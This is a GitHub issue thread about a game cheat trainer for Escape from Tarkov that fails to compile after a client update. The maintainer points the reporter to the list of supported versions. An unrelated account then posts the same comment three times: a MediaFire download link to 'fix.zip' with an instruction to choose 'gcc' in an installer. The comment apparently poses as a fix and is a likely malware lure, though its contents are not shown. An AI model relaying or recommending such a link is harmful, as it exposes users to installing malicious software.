### ISSUE TITLE
Unable to compile trainer for version 0.15.0.32160. Please file an issue here : https://github.com/sailro/EscapeFromTarkov-Trainer/issues

### ISSUE THREAD

**Issue by evgenbish** [sailro/EscapeFromTarkov-Trainer#551]
Hello. There is a problem when running on the Client.0.15.0.1.32160

**Comment by sailro** [comment]
The first line in the issue template :)

_Double check the [main page](https://github.com/sailro/EscapeFromTarkov-Trainer) for the latest EFT and SPT-AKI versions we support._

**Comment by darkstorm4hack** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by darkstorm4hack** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by darkstorm4hack** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."
